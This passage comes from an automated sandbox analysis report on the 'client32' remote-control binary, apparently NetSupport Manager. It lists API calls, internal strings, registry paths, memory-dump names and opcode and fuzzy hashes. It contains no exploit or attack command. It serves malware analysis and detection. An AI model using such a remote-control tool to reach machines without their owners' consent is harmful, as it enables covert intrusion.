                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • IsA(), xrefs: 1100960D, 11009635
                                                        • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 110095D9
                                                        • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009665
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009608, 11009630
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                        • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 863766397-2085542942
                                                        • Opcode ID: d60069f5e1de0f43d3ee76dcbf86c54028c08c36dc082fe327747f164939fbe6
                                                        • Instruction ID: 691b7d999311c479868ee19ae1316f275a6346ce6453caec75fd1e84fec43159
                                                        • Opcode Fuzzy Hash: d60069f5e1de0f43d3ee76dcbf86c54028c08c36dc082fe327747f164939fbe6
                                                        • Instruction Fuzzy Hash: EB214C79A0061AABDB11DF95CC41FDEF3B8FF59614F104259E921B3280EB747904CEA0
                                                        APIs
                                                        • GetClientRect.USER32(00000000,?), ref: 1100560D
                                                        • BeginPaint.USER32(?,?), ref: 11005618
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100563A
                                                        • EndPaint.USER32(?,?), ref: 1100565F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110055F3
                                                        • m_hWnd, xrefs: 110055F8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1216912278-1557312927
                                                        • Opcode ID: 97d3c940d63b297fb10f83f3dfb68609f49cd421d87f9b9cd799dfe9b4fbcbfc
                                                        • Instruction ID: 9d934249f53fa8d366fcc49e738241deeb513e329cffd45cc01f0ae030ad81d4
                                                        • Opcode Fuzzy Hash: 97d3c940d63b297fb10f83f3dfb68609f49cd421d87f9b9cd799dfe9b4fbcbfc
                                                        • Instruction Fuzzy Hash: 3E118F76A00614BFE711CBA0CC85FAEF3BCEB88704F108129F50697180EA70B904CB65
                                                        APIs
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1100B280
                                                        • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
                                                        • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
                                                          • Part of subcall function 1100A1E0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1FE
                                                          • Part of subcall function 1100A1E0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A228
                                                          • Part of subcall function 1100A1E0: GetLastError.KERNEL32 ref: 1100A230
                                                          • Part of subcall function 1100A1E0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A244
                                                          • Part of subcall function 1100A1E0: CloseHandle.KERNEL32(00000000), ref: 1100A24B
                                                        • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
                                                        • LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
                                                        • _free.LIBCMT ref: 1100B2F8
                                                        • _free.LIBCMT ref: 1100B2FE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                        • String ID:
                                                        • API String ID: 705253285-0
                                                        • Opcode ID: 58f407269e751de9f91f6fa657191078a7fc4bd98738b10eb03c05d2ca273642
                                                        • Instruction ID: b53c431c1fdfdfa32c825fd1fca90191d00be8cf6b766cb547cd0a2bc680ebd8
                                                        • Opcode Fuzzy Hash: 58f407269e751de9f91f6fa657191078a7fc4bd98738b10eb03c05d2ca273642
                                                        • Instruction Fuzzy Hash: 4211827A900B15AFE712CE60DC88BEFB3ACEF4A399F004529FA2656140D770B541CB61
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 110AF354
                                                        • GetSubMenu.USER32(00000000,00000002), ref: 110AF35D
                                                        • GetMenuItemCount.USER32(00000000), ref: 110AF366
                                                        • DeleteMenu.USER32(00000000,00000000,00000400,00000000,00000000,?,?,?,110B3F22,75A37C34,?), ref: 110AF388
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110AF33E
                                                        • m_hWnd, xrefs: 110AF343
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$CountDeleteErrorExitItemLastMessageProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2484136202-1557312927
                                                        • Opcode ID: bcacf5f189fccd2e56c6c5f12fc971f734e75ed69440acf96920cd341ab3bb06
                                                        • Instruction ID: 740f4026c9f67b21facb63a7154dcb50d19f95f0e9da13a6ec497569553e537b
                                                        • Opcode Fuzzy Hash: bcacf5f189fccd2e56c6c5f12fc971f734e75ed69440acf96920cd341ab3bb06
                                                        • Instruction Fuzzy Hash: 4FF0EC73D41720BFD3129AB0AC88F8DF398BB49759F048929F601E71C4D7645841C7A5
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EF1), ref: 110033ED
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11003413
                                                        • DestroyMenu.USER32(00000000), ref: 11003442
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 468487828-934300333
                                                        • Opcode ID: df64ea0d2fae3ecbce4d898b4dfec4b1ea76ad89041e8687394a6c81806b7d14
                                                        • Instruction ID: 1cad6fc9c95bf05f50b6ce3caf6643c8411129ac664c74d8947400ee595e6a5d
                                                        • Opcode Fuzzy Hash: df64ea0d2fae3ecbce4d898b4dfec4b1ea76ad89041e8687394a6c81806b7d14
                                                        • Instruction Fuzzy Hash: A9F0A73EE5456237D9136265AC09F8FB6D4CB965ADF058031F800BA685EA20B40145F5
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EFD), ref: 110032FD
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11003323
                                                        • DestroyMenu.USER32(00000000), ref: 11003352
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 468487828-934300333
                                                        • Opcode ID: cb8f0810ee07e3752238a0c809691a2f2e075db7e03e247ef5e11464e5e03cf9
                                                        • Instruction ID: d45ddfe76467ef9f778f5ab9a3906980c2d231470f314a4c50cab6afe01776b3
                                                        • Opcode Fuzzy Hash: cb8f0810ee07e3752238a0c809691a2f2e075db7e03e247ef5e11464e5e03cf9
                                                        • Instruction Fuzzy Hash: 25F0A03EE5466227D9136665AC4AF8FBBD5CB966AAF048031F800E6384EA20A40145B5
                                                        APIs
                                                        • __time64.LIBCMT ref: 1105D3A6
                                                          • Part of subcall function 111521E3: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,11104EFA,?,00000000,00000001,00020001,?,?,currentver,?), ref: 111521EE
                                                          • Part of subcall function 111521E3: __aulldiv.LIBCMT ref: 1115220E
                                                        • __localtime64.LIBCMT ref: 1105D3AF
                                                          • Part of subcall function 11154DED: __localtime64_s.LIBCMT ref: 11154E02
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 1105D438
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 1105D442
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1105D463
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1105D471
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__localtime64__localtime64_s__time64
                                                        • String ID:
                                                        • API String ID: 667980571-0
                                                        • Opcode ID: baf43ef1593a7cdecb94672a433a1750632353f139cf7ae1fa9ef072f7b28b7a
                                                        • Instruction ID: c1e4814d99555f495de290984051ba4bd9ed83c2fedc9342f642c632bc13bcf0
                                                        • Opcode Fuzzy Hash: baf43ef1593a7cdecb94672a433a1750632353f139cf7ae1fa9ef072f7b28b7a
                                                        • Instruction Fuzzy Hash: 3E317C76D1021CABCF44DFE8DC41AEEF7B8EF48314F04812AE815B7240EA746A04CBA5
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 1103F1C5
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • NO VALID SMARTCARD DEVICE!!!, xrefs: 1103F1DB
                                                        • CLTCONN.CPP, xrefs: 1103F1A0
                                                        • Error %d writing to smartcard device, xrefs: 1103F1CC
                                                        • transferred == datalen, xrefs: 1103F1A5
                                                        • Written %u bytes to smartcard device, xrefs: 1103F1B6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                        • String ID: CLTCONN.CPP$Error %d writing to smartcard device$NO VALID SMARTCARD DEVICE!!!$Written %u bytes to smartcard device$transferred == datalen
                                                        • API String ID: 73808336-3603962039
                                                        • Opcode ID: 94856a4078b3ac11fe05ef5c0c08bd18a798151c73576af9460396963e9f6036
                                                        • Instruction ID: d1e1036eaa595ab7b5070c6635154fdad5e0fb19e25623191bbb8a120220dee9
                                                        • Opcode Fuzzy Hash: 94856a4078b3ac11fe05ef5c0c08bd18a798151c73576af9460396963e9f6036
                                                        • Instruction Fuzzy Hash: 3821B0B6900509AFCB00CF54ED41FDEF775EB95729F008269FC1567380EB30AA04CAA2
                                                        APIs
                                                        • __getptd.LIBCMT ref: 1115F0CE
                                                          • Part of subcall function 1115A195: __getptd_noexit.LIBCMT ref: 1115A198
                                                          • Part of subcall function 1115A195: __amsg_exit.LIBCMT ref: 1115A1A5
                                                        • __amsg_exit.LIBCMT ref: 1115F0EE
                                                        • __lock.LIBCMT ref: 1115F0FE
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1115F11B
                                                        • _free.LIBCMT ref: 1115F12E
                                                        • InterlockedIncrement.KERNEL32(02D01688), ref: 1115F146
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 3470314060-0
                                                        • Opcode ID: e40253f875d940b7a8dc3236e0f89e6710caf89b4cb49835c4960a95df8dfdc6
                                                        • Instruction ID: 803fd973862948a3a3ecb7a001aea24e080d02acdb4679c2f1c74669b507a754
                                                        • Opcode Fuzzy Hash: e40253f875d940b7a8dc3236e0f89e6710caf89b4cb49835c4960a95df8dfdc6
                                                        • Instruction Fuzzy Hash: 3D018436901B339BDBD29F65C48974DF760AB0772CF188555E830A7284CB746942CFD2
                                                        APIs
                                                        Strings
                                                        • CalledControl connectCB (ConnectToClient), xrefs: 1105F3C3
                                                        • Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s..., xrefs: 1105F39A
                                                        • CalledControl queuing connectCB, xrefs: 1105F3FE
                                                        • Processed EV_CALLED_CONTROL s=%d, addr=%s, xrefs: 1105F483
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: CalledControl connectCB (ConnectToClient)$CalledControl queuing connectCB$Processed EV_CALLED_CONTROL s=%d, addr=%s$Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s...
                                                        • API String ID: 269201875-3945191877
                                                        • Opcode ID: a281abe468fc8cf5dea406ee3c8c3c03f4288b3989de67ec6b479d0f55733ec8
                                                        • Instruction ID: eba7aeba7a80585ba5bfcf02ccd4cc4943b90b94df59a5d5031289039a8223e0
                                                        • Opcode Fuzzy Hash: a281abe468fc8cf5dea406ee3c8c3c03f4288b3989de67ec6b479d0f55733ec8
                                                        • Instruction Fuzzy Hash: C64163B9A04A41AFD794CFA4DD44F56F7E4FF44718F10865EE85983280EB74B844CBA2
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 11055450
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 110554AF
                                                        • RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 11055521
                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 1105552E
                                                        Strings
                                                        • SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 11055409, 11055444
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumValue$CloseOpen
                                                        • String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                        • API String ID: 3785232357-4133889954
                                                        • Opcode ID: 522fb6f12ae8a7514099b8464e6d3ecc568f065a2cd26f1cbba31b508d85541a
                                                        • Instruction ID: 4fc8b8c254a8e03eea46efce211ec302a356c8092de060a52f9bb50f925273d8
                                                        • Opcode Fuzzy Hash: 522fb6f12ae8a7514099b8464e6d3ecc568f065a2cd26f1cbba31b508d85541a
                                                        • Instruction Fuzzy Hash: F0416672E112299FEB54CF54CC91FDAB7B8AB49704F4042D9E60DE7180EA716E44CFA1
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 110D3704
                                                        • __CxxThrowException@8.LIBCMT ref: 110D3719
                                                          • Part of subcall function 110091F0: std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                          • Part of subcall function 110091F0: _memmove.LIBCMT ref: 110092B6
                                                        Strings
                                                        • Your system/device requires approval by the service before you can access it fully, xrefs: 110D36D7
                                                        • Invalid Passcode, xrefs: 110D3695
                                                        • The version of the software you are running is not supported by the service, xrefs: 110D36B6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8ThrowXinvalid_argument_malloc_memmove_memsetstd::_std::exception::exceptionwsprintf
                                                        • String ID: Invalid Passcode$The version of the software you are running is not supported by the service$Your system/device requires approval by the service before you can access it fully
                                                        • API String ID: 390219819-299493402
                                                        • Opcode ID: 767883e3574baf54fe023af10dad3d7da6e7b29b5df840732df2b4cd092bae1b
                                                        • Instruction ID: 290987c637faf9a82613e3c1efdfb8245697807f6b36602a3304b8d6bb74055a
                                                        • Opcode Fuzzy Hash: 767883e3574baf54fe023af10dad3d7da6e7b29b5df840732df2b4cd092bae1b
                                                        • Instruction Fuzzy Hash: FC4162B5A0420AABD700CF99C850BDAF7F8FF08314F00865AE91997781DB74AA04CBA0
                                                        APIs
                                                        • KillTimer.USER32(00000000,00000001), ref: 1104919C
                                                          • Part of subcall function 11035830: wsprintfA.USER32 ref: 1103589E
                                                          • Part of subcall function 11035830: SetDlgItemTextA.USER32(?,?,?), ref: 1103596F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemKillTextTimerwsprintf
                                                        • String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1646146092-2249245707
